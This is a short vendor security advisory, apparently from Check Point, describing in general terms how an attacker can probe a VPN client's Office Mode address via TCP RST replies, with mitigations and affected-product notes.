The incoming packets to the Office Mode address are handled first by the operating system's TCP stack. When a SYN-ACK packet enters a non-existing connection, the operating system will reply with a RST: this allows the attacker to determine the IP address.

In the same manner, the attacker can guess the external IP addresses to which the user is connected, and from there guess the TCP sequence number and try to interfere with the connection.

Important notes:

• Since the traffic is encrypted over our VPN tunnel, no data can be seen or changed by the attacker.
• Since most of the outgoing traffic nowadays is over SSL (inside the VPN tunnel), the SSL stack will ignore the packets sent by the attacker and the TCP sequence will not be disrupted, either.

The Check Point Firewall Blade on Endpoint Client for Mac can be used to block the incoming connections to the Office Mode IP address, which will end the attack in stage 1.

The Gaia operating system, our site-to-site IPsec VPN, and Capsule Workspace are not affected by this vulnerability.

The solution for this issue needs to come from the operating system maintainers as the bug is in their code. It is always recommended to update your operating system with the latest updates.